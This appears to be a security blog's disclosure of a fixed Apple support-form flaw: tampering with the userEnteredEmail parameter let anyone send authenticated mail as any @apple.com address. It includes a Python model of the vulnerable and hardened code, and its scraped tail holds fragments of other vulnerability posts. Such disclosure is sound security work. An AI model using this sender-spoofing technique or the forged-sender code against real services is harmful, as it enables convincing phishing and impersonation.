<p>Web Security Geeks - The Security Blog, by Narendra Bhati. Post "How I Was Able To Send Emails On Behalf of Any Apple User Email, Yes Any!!!", published 2022-06-22, last updated 2024-01-05.</p>
<h1 style="clear: both; text-align: center;">
How I Was Able To Send Emails On Behalf of Any Apple User Email, Yes Any!!! 😜
</h1>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sFaHTMI3COubGjq_rAwoVfRlHcLNWw--yf3Hvg02tBbM8ZCWIctzEXWnmTJJuXOkbuwjTtKsh_OazJZG4oTREUKGoC4Jf7Z1Fh7Gwn2EgNbCLChNu4z0_SBeaZkMyKCunu8UqjzDoMHp3RMqLpAyOEdILpkqIdGieG5o6UitreGdZRrU2kt19_xy/s1679/ss3.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1679"
data-original-width="1080"
height="400"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sFaHTMI3COubGjq_rAwoVfRlHcLNWw--yf3Hvg02tBbM8ZCWIctzEXWnmTJJuXOkbuwjTtKsh_OazJZG4oTREUKGoC4Jf7Z1Fh7Gwn2EgNbCLChNu4z0_SBeaZkMyKCunu8UqjzDoMHp3RMqLpAyOEdILpkqIdGieG5o6UitreGdZRrU2kt19_xy/w258-h400/ss3.jpg"
width="258"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
<div>
<b>======================================================================</b>
</div>
<div style="text-align: center;">
<u>Permission to disclose was discussed with the Apple Security Team before this post was published.</u>
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
Hello all. During 2020 I spent most of my time breaking Apple systems and getting good bugs accepted by the Apple Security Bug Bounty Program. Most of that time went into Apple products, which are my personal favourite area (not web apps), but a few of the bugs I found were in web apps.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
I have been asked on Twitter and LinkedIn to disclose my findings, and to be frank, after 2020 I was packed with other activities and never got around to writing them up.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
As this vulnerability (sending emails on behalf of any Apple email address) is very straightforward, I decided to put together a quick POC along with this write-up.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><b>Impact</b></div>
<div style="text-align: left;">
An attacker can launch mass phishing campaigns against Apple users and Apple employees, and can impersonate someone else's identity outright. For example, an attacker could send emails on behalf of product-security@apple.com to bug bounty hunters, tcook@apple.com to Apple employees, or security@apple.com to send Apple users a fake security breach notice. Because the mail really originates from Apple's own infrastructure, the usual sender-authentication checks at the receiving side do not flag it.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
<b><u>Timeline</u></b>
</div>
<div style="text-align: left;">
<b>Initial Report - </b>Aug 24, 2020, 9:25 PM
</div>
<div style="text-align: left;">
<b>Triaged - </b>Aug 31, 2020, 10:43 AM
</div>
<div style="text-align: left;">
<b>Fix Deployed - </b>Oct 14, 2020, 9:24 AM
</div>
<div style="text-align: left;">
<b>Bounty Awarded - </b>Nov 21, 2020, 5:24 AM
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
Let's start! The first web application I targeted was <b>https://developer.apple.com</b>. Most of its API endpoints were well protected against IDOR and other low-hanging fruit.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
After a short while their support system caught my attention; at the time of my research it looked like this.
</div>
<div style="text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvefJP2iLf-D9ve9vo2Nltg9xpCkP1qsgh9cMWZa94-1QFd5jtdDPU9wLnqQLdAJLxRavYKsupLhbhGZhthQv-eO_hcF2aihFmAVy2mEXFqIcPGoKlH8fW-gXl1tNc8PzY0LiUiDr-RqbM7_vRDDbCA3QOMZGwPHcqu-kodUqS_iM38TKnGjLVznX/s1602/Screenshot%202022-06-22%20at%208.42.23%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="788"
data-original-width="1602"
height="315"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvefJP2iLf-D9ve9vo2Nltg9xpCkP1qsgh9cMWZa94-1QFd5jtdDPU9wLnqQLdAJLxRavYKsupLhbhGZhthQv-eO_hcF2aihFmAVy2mEXFqIcPGoKlH8fW-gXl1tNc8PzY0LiUiDr-RqbM7_vRDDbCA3QOMZGwPHcqu-kodUqS_iM38TKnGjLVznX/w640-h315/Screenshot%202022-06-22%20at%208.42.23%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
When a support ticket is submitted, the API endpoint takes a parameter called
<b>userEnteredEmail</b>, and this parameter is what caused the vulnerability: the server uses whatever address the client supplies as the sender of the resulting email, without checking that it belongs to the account submitting the ticket. After changing it to any <b>xxxx@apple.com</b> address, the victim receives an email that appears to come from that address.
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
Example: here I have sent an email on behalf of <b>security@apple.com</b>.
</div>
<div class="separator" style="clear: both; text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODIHRZGw149C2ZT6VVatMKbdfonPGWVrwFdUYDfDSf5QJ3kZjDHcy9wznRpCCQLEFlX-J40uHdHTLavhCURbWR4_MqkUReaBrd8wSGZA1h1uDQVIaq9NtI5zp3qm2QHmxRmKY2zoQpcT2IzFfiyJC62WYyXmgTz4-CTWVHx2pAlEb5ACvVMCx9UWR/s1280/Screenshot%202020-08-24%20at%2012.47.20%20PM%20(1).png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="736"
data-original-width="1280"
height="368"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODIHRZGw149C2ZT6VVatMKbdfonPGWVrwFdUYDfDSf5QJ3kZjDHcy9wznRpCCQLEFlX-J40uHdHTLavhCURbWR4_MqkUReaBrd8wSGZA1h1uDQVIaq9NtI5zp3qm2QHmxRmKY2zoQpcT2IzFfiyJC62WYyXmgTz4-CTWVHx2pAlEb5ACvVMCx9UWR/w640-h368/Screenshot%202020-08-24%20at%2012.47.20%20PM%20(1).png"
width="640"
/></a>
</div>
<b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
This one is from <b>product-security@apple.com</b>.
</div>
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHjCK5KCPdNQF_Z2pFx8z52AyFXoBK9_Y7nna-cJ6zE1G8QcJkMx852f6f54rD_XsELtDzCypPpHBS5c5QlRvptM5Z3otG8OpUEMfSd9GcpClPME_wIuy2Lst-HMx08vl6WJ8ruwQgD85grQUxEyXGSuyS_6rsHpb8L-zDd6cjmPe9OmVffb0zWMx/s1212/Screenshot%202022-06-22%20at%208.50.32%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="646"
data-original-width="1212"
height="342"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHjCK5KCPdNQF_Z2pFx8z52AyFXoBK9_Y7nna-cJ6zE1G8QcJkMx852f6f54rD_XsELtDzCypPpHBS5c5QlRvptM5Z3otG8OpUEMfSd9GcpClPME_wIuy2Lst-HMx08vl6WJ8ruwQgD85grQUxEyXGSuyS_6rsHpb8L-zDd6cjmPe9OmVffb0zWMx/w640-h342/Screenshot%202022-06-22%20at%208.50.32%20AM.png"
width="640"
/></a>
</div>
<br /><b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: center;">
This one is from timcook@apple.com, which a few of you might have been waiting for 😅
</div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkuOOXxOZEvU7GgAhNA7nlGIBWl0EiNpP1l7WUkrCzQ2sjGtG9fg5uXsV-QrTn9fGdyyZQSrepJ6sHHTyrXRzTK4CN1NWLxFpndbi8f-BIVnx-Pc1sx1_-4nIfD5yL7FZKDV5-3sHgYqXFYlvqpVLMo4Ypx2ivQpxZE5eAJzmzJdlF2jePOOwudUms/s1642/Screenshot%202022-06-22%20at%208.52.44%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1178"
data-original-width="1642"
height="460"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkuOOXxOZEvU7GgAhNA7nlGIBWl0EiNpP1l7WUkrCzQ2sjGtG9fg5uXsV-QrTn9fGdyyZQSrepJ6sHHTyrXRzTK4CN1NWLxFpndbi8f-BIVnx-Pc1sx1_-4nIfD5yL7FZKDV5-3sHgYqXFYlvqpVLMo4Ypx2ivQpxZE5eAJzmzJdlF2jePOOwudUms/w640-h460/Screenshot%202022-06-22%20at%208.52.44%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
Here are the complete mail headers of this email.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgai8zoxfny4TFaUCCBkhlP6gd9JHdeTZfugCpMNow8N0QGUTMqCEbv2loZyfv-bM0Q16WZrAnDzUHxy88TPU_QaZewqJgHab1HpcYyRQlCsgWbR248BPZj5OcBGvwfyRZqsV2ViBjgVkWakDuVqrWlFFC9bhfHK2oV-k4DfhmeRQuzXvKiuOeHNM2B/s1630/Screenshot%202022-06-22%20at%208.53.45%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1152"
data-original-width="1630"
height="452"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgai8zoxfny4TFaUCCBkhlP6gd9JHdeTZfugCpMNow8N0QGUTMqCEbv2loZyfv-bM0Q16WZrAnDzUHxy88TPU_QaZewqJgHab1HpcYyRQlCsgWbR248BPZj5OcBGvwfyRZqsV2ViBjgVkWakDuVqrWlFFC9bhfHK2oV-k4DfhmeRQuzXvKiuOeHNM2B/w640-h452/Screenshot%202022-06-22%20at%208.53.45%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
The Gmail app also has a feature called <b>Signed by</b>, which shows the domain that signed the message once it has passed authentication. Emails sent through this vulnerability show up as signed by apple.com, which means they really are handed from Apple's mail servers to the receiving mail server and pass every standard mail authentication check: SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (Domain-based Message Authentication, Reporting and Conformance). That makes the issue far more severe, because those checks are exactly what receivers rely on to reject spoofed mail; all of them authenticate the sending domain and infrastructure, not the individual mailbox named in the From header.
</div>
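<div style="text-align: left;">
The following is an added example, not code from the original post or from Apple, that models the two points above: a support-ticket endpoint copying the client-supplied <b>userEnteredEmail</b> parameter straight into the sender address, and why such a mail still passes SPF, DKIM and DMARC at the receiver. The function names, the <b>no-reply@support.example.com</b> service address and the request and session dictionaries are assumptions for illustration; nothing here is Apple's code or API.
</div>

```python
# Added example, not code from the original post or from Apple. It models the
# pattern described above: a support-ticket mailer that copies the
# client-supplied userEnteredEmail parameter into the From header, beside a
# hardened version. All names here (the functions, NOREPLY_SENDER, the request
# and session dictionaries) are assumptions for illustration.
from email.message import EmailMessage
from email.utils import parseaddr

NOREPLY_SENDER = "no-reply@support.example.com"  # assumed fixed service identity


class UntrustedSender(ValueError):
    """Raised when a client claims an address it does not own."""


def build_ticket_mail_vulnerable(req: dict) -> EmailMessage:
    """Vulnerable pattern: whatever the client put in userEnteredEmail becomes
    the From header. The mail still leaves through the provider's own MTA, so
    SPF, DKIM and DMARC for the provider's domain all pass on the receiving side.
    """
    msg = EmailMessage()
    msg["From"] = req["userEnteredEmail"]          # attacker-controlled
    msg["To"] = req["recipient"]
    msg["Subject"] = req["subject"]
    msg.set_content(req["body"])
    return msg


def build_ticket_mail_hardened(req: dict, session: dict) -> EmailMessage:
    """Hardened: From is a fixed service address the client cannot influence.
    The user-entered address is only accepted when it matches the address of
    the authenticated account, and even then it goes into Reply-To and the
    body, never into From."""
    claimed = parseaddr(req["userEnteredEmail"])[1].strip().lower()
    owned = session["account_email"].strip().lower()
    if not claimed or claimed != owned:
        raise UntrustedSender(f"{claimed!r} does not belong to the logged-in account")
    msg = EmailMessage()
    msg["From"] = NOREPLY_SENDER
    msg["Reply-To"] = claimed
    msg["To"] = req["recipient"]
    msg["Subject"] = req["subject"]
    msg.set_content(f"{req['body']}\n\nTicket submitted by: {claimed}")
    return msg


def hardened_accepts(req: dict, session: dict) -> bool:
    """True when the hardened builder would send the mail, False when it rejects."""
    try:
        build_ticket_mail_hardened(req, session)
        return True
    except UntrustedSender:
        return False


def dmarc_aligned(msg: EmailMessage, dkim_signing_domain: str) -> bool:
    """Receiver-side view of why the forged mail is accepted: DMARC only checks
    that the domain in the From header aligns with the DKIM d= domain (or the
    SPF-authenticated domain). It says nothing about whether the local part
    (the mailbox) was authorised to send."""
    from_domain = parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1].lower()
    return from_domain == dkim_signing_domain.lower()


# Constructed sample request: an attacker logged in as attacker@example.net
# submits a ticket and lies in the userEnteredEmail field.
SAMPLE_REQUEST = {
    "userEnteredEmail": "security@apple.com",
    "recipient": "victim@example.org",
    "subject": "Security notice",
    "body": "Your account was accessed from a new device.",
}
SAMPLE_SESSION = {"account_email": "attacker@example.net"}
# Same ticket, but with the address the session actually owns (case differs on purpose).
HONEST_REQUEST = dict(SAMPLE_REQUEST, userEnteredEmail="Attacker@Example.net")

if __name__ == "__main__":
    forged = build_ticket_mail_vulnerable(SAMPLE_REQUEST)
    print("vulnerable From:", forged["From"],
          "| DMARC-aligned with apple.com:", dmarc_aligned(forged, "apple.com"))
    print("hardened accepts forged sender:", hardened_accepts(SAMPLE_REQUEST, SAMPLE_SESSION))
    honest = build_ticket_mail_hardened(HONEST_REQUEST, SAMPLE_SESSION)
    print("hardened From:", honest["From"], "| Reply-To:", honest["Reply-To"])
```

<div style="text-align: left;">
The hardened builder pins the sender identity to a service address and only lets the user-entered address into Reply-To, after checking it against the authenticated account. The dmarc_aligned helper shows the receiver's side: DMARC compares the From domain with the DKIM signing domain, so a forged local part at the provider's own domain aligns perfectly, which is exactly why the messages in the screenshots above show as signed by apple.com.
</div>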
<div class="separator" style="clear: both; text-align: left;">
<div class="separator" style="clear: both;"><br /></div>
<div class="separator" style="clear: both;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCIICBEw7fcMkbFDYT1XpmJxZiMyJ8b2G2ZAQ5eIFDB_Ow1n-0mMREEBSvJjjT9SpwNvEh7stYGzNEfg9TrJExn_bnzr9B7QsTa8Z1BV7myLOf32amcfTC4ulWFhitcasd-_IiGQzYkebIwmxmmvRgI2BarvZIpczFAVTV81OoxzMZBjbSthaSq5X/s2088/Screenshot%202022-06-22%20at%209.19.48%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="808"
data-original-width="2088"
height="248"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCIICBEw7fcMkbFDYT1XpmJxZiMyJ8b2G2ZAQ5eIFDB_Ow1n-0mMREEBSvJjjT9SpwNvEh7stYGzNEfg9TrJExn_bnzr9B7QsTa8Z1BV7myLOf32amcfTC4ulWFhitcasd-_IiGQzYkebIwmxmmvRgI2BarvZIpczFAVTV81OoxzMZBjbSthaSq5X/w640-h248/Screenshot%202022-06-22%20at%209.19.48%20AM.png"
width="640"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo7uWCvnxeZ1ipgmLtdER3FXnwz0_NZ_4fvgLYUPPTHbhvLzASpBakQ9O4l7CxiGgvfD49W4fxTzJcQ-feObD4yH6picBYDaevNDSVc5YvXktWQAP-7yFisuqAXMZhRanh-2kXKcunRuf83T6QFnLMxQQx0WObvd8shQlk382S4EfnGj4Vy2gJgSxX/s1679/IMG_20200825_163356.jpg"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1679"
data-original-width="1080"
height="640"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo7uWCvnxeZ1ipgmLtdER3FXnwz0_NZ_4fvgLYUPPTHbhvLzASpBakQ9O4l7CxiGgvfD49W4fxTzJcQ-feObD4yH6picBYDaevNDSVc5YvXktWQAP-7yFisuqAXMZhRanh-2kXKcunRuf83T6QFnLMxQQx0WObvd8shQlk382S4EfnGj4Vy2gJgSxX/w412-h640/IMG_20200825_163356.jpg"
width="412"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
POC Video
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe
allowfullscreen=""
class="BLOG_video_class"
height="266"
src="https://www.youtube.com/embed/Nu4yaxtYsMk"
width="453"
youtube-src-id="Nu4yaxtYsMk"
></iframe>
</div>
<br />
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
The email also contains some additional boilerplate text from <b>Apple Support</b>, which looks legitimate and makes the victim trust the email even more.
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<br />
<div class="separator" style="clear: both;">
Please share and let me know your comments. Happy hacking to all.
</div>
<div class="separator" style="clear: both;"><br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-26949236629609990302022-02-05T10:47:00.004+05:302022-02-05T10:47:34.697+05:30Apple Stored XSS : $5000 Bounty<p style="text-align: center;"> </p><h1 class="title style-scope ytd-video-primary-info-renderer" style="-webkit-box-orient: vertical; -webkit-line-clamp: 2; border: 0px; color: var(--ytd-video-primary-info-renderer-title-color,var(--yt-spec-text-primary)); display: -webkit-box; font-family: var(--ytd-video-primary-info-renderer-title-font-family,inherit); font-size: var(--ytd-video-primary-info-renderer-title-font-size,var(--yt-navbar-title-font-size,inherit)); font-variant: var(--ytd-video-primary-info-renderer-title-font-variant,inherit); font-weight: 400; line-height: 2.6rem; margin: 0px; max-height: 5.2rem; overflow: hidden; padding: 0px; text-align: center; text-overflow: ellipsis; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow,none); transform: var(--ytd-video-primary-info-renderer-title-transform,none);"></h1><h2><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></h2><h2><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></h2><h2 style="text-align: center;"><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"> Apple Stored XSS : $5000</yt-formatted-string></h2><div><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><yt-formatted-string 
class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="352" src="https://www.youtube.com/embed/fz7_k8mYY3I" width="565" youtube-src-id="fz7_k8mYY3I"></iframe></div><br /><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div class="style-scope ytd-video-primary-info-renderer" id="info" style="align-items: center; border: 0px; display: flex; flex-direction: row; margin: 0px; padding: 0px;"></div><br class="Apple-interchange-newline" />Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-79688484546675096782021-04-02T09:26:00.007+05:302021-05-17T07:36:03.828+05:30My Journey In Suma Soft From Stammer To Millionaire<h1 style="text-align: center;"><b> <span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;">My Journey In Suma Soft From Stammer To Millionaire - imnarendrabhati</span></b></h1><div style="text-align: center;"><b><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/2w5yM_5nueQ" width="608" youtube-src-id="2w5yM_5nueQ"></iframe></div><br /><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" 
face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div>Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-68018076045450479172020-12-15T17:23:00.015+05:302023-10-28T14:37:00.690+05:30Address Bar Spoofing Vulnerability in Multiple Browsers<div><div style="text-align: left;"><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div></div></div><div><br /></div><h1 style="clear: both; text-align: center;">Address Bar Spoofing Vulnerability in Multiple Browsers(<b>Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)</b></h1><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgwERf0NIQGAQEmm_VXYJddvzIHnwxbz3fScJQY5dULJ8CGvsGhPrY5n4M02_nHQ46lTFt2ZTU0U4KfL_-c4UiE_wg-OgLu0Ft0H81npRybxGLj5pSa1kwcHLwUfAfR3oQ_luSerpTvSs/s585/Screenshot+2020-11-12+at+7.40.46+PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="585" data-original-width="321" height="396" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgwERf0NIQGAQEmm_VXYJddvzIHnwxbz3fScJQY5dULJ8CGvsGhPrY5n4M02_nHQ46lTFt2ZTU0U4KfL_-c4UiE_wg-OgLu0Ft0H81npRybxGLj5pSa1kwcHLwUfAfR3oQ_luSerpTvSs/w218-h396/Screenshot+2020-11-12+at+7.40.46+PM.png" width="218" /></a></div><br /><div><br /></div><h1 style="text-align: center;"><b>Jio Android Browser Address Bar Spoofing Vulnerability (Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)</b></h1><div style="text-align: center;"><br /></div><div style="text-align: left;"><a href="https://www.ehackingnews.com/search/label/URL%20Spoofing" target="_blank">Address Bar Spoofing/ URL Spoofing</a> vulnerability allows an attacker to show fake/malicious content on a valid domain.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">More Details on this is available over <a href="https://www.ehackingnews.com/" target="_blank">EHackingNews</a> website</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Ex. 
In the Left Side you can see on Address Bar showing as jio.com(Valid Content) and In the Right Side is also jio.com(Fake Contents) That's indicate an Address Bar Spoofing Vulnerability </div><div style="text-align: left;"><br /></div><span><a name='more'></a></span><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"> </div><div style="text-align: left;"><b> jio.com(Valid Content)</b> <b>jio.com(Fake Contents)</b></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjESz5OUyOLFIifYDB6G4e3U8fEmwUVN1ruo-y561amCtjoBO7SxnYryDd9bjpcCCkcX9FhP7PGCUVhyphenhyphengDq0EDQ1okL-SbJlVTTZzDIW4T0p1xfewnxLt9n0oW1v1OAA4ir8keXr5o6Jt0/s2160/Screenshot_20201119-181633.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2160" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjESz5OUyOLFIifYDB6G4e3U8fEmwUVN1ruo-y561amCtjoBO7SxnYryDd9bjpcCCkcX9FhP7PGCUVhyphenhyphengDq0EDQ1okL-SbJlVTTZzDIW4T0p1xfewnxLt9n0oW1v1OAA4ir8keXr5o6Jt0/s320/Screenshot_20201119-181633.jpg" /></a>. 
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpRH_ASfJSr97XVIjQglFhOrQZ_1aapi-gAfwzbhdxFc3WS4K8OR8rLbHCUCRnGugeVTvAgN-Sq3g9joa-mTeMR2Lk09lB0D7bf2G_bwQR4_8GwYWV8Ldf5poIvLv23bgn2VPHTOXzKAE/s2160/Screenshot_20201119-181611.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="2160" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpRH_ASfJSr97XVIjQglFhOrQZ_1aapi-gAfwzbhdxFc3WS4K8OR8rLbHCUCRnGugeVTvAgN-Sq3g9joa-mTeMR2Lk09lB0D7bf2G_bwQR4_8GwYWV8Ldf5poIvLv23bgn2VPHTOXzKAE/s320/Screenshot_20201119-181611.jpg" /></a><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">After banning Chinese applications in India, people are encourage to use #MadeInIndia apps to promote Apps made by Indian companies/peoples. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Just like this Apps Made in India ex. Jio Browser got my attention as its have a Clean User Interface and easy to use feature just like other popular browser. 
While researching I found that Jio Browser isn't handling URL properly which allow a Malicious User to perform Address Bar Spoof attacks on User/Victims.</div><div style="text-align: left;"><br /></div><div style="text-align: center;">Here is the Video Demonstration</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/vGlPnqhJgEs" width="320" youtube-src-id="vGlPnqhJgEs"></iframe></div><div><br /></div><div><br /></div><b>Tested Environment</b><div><b><br /></b><div>Device - One Plus 5T <div>Android - 10.0.0</div><div>Jio Browser Version - 1.4.6</div><div><br /></div><div><b>Timeline of Reporting</b></div><div>Initial Report- Tue, Jun 30 2020</div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuTzvjQRrDYofPCwd06cca3YwxBktou40JYEGRvF6Q6FONo2kQRyP5T3WGRPZB1MBomzXSBhHWpxPEtiZUfBRV49nxLjAgTEH5WB_qf_MdQ-c3FjWp6lobgLJ1A3_5hohV4hDXB0eyNYU/s1280/1.Jio+Initial.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1280" data-original-width="847" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuTzvjQRrDYofPCwd06cca3YwxBktou40JYEGRvF6Q6FONo2kQRyP5T3WGRPZB1MBomzXSBhHWpxPEtiZUfBRV49nxLjAgTEH5WB_qf_MdQ-c3FjWp6lobgLJ1A3_5hohV4hDXB0eyNYU/w265-h400/1.Jio+Initial.jpeg" width="265" /></a><br /><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Initial Response - They responded 
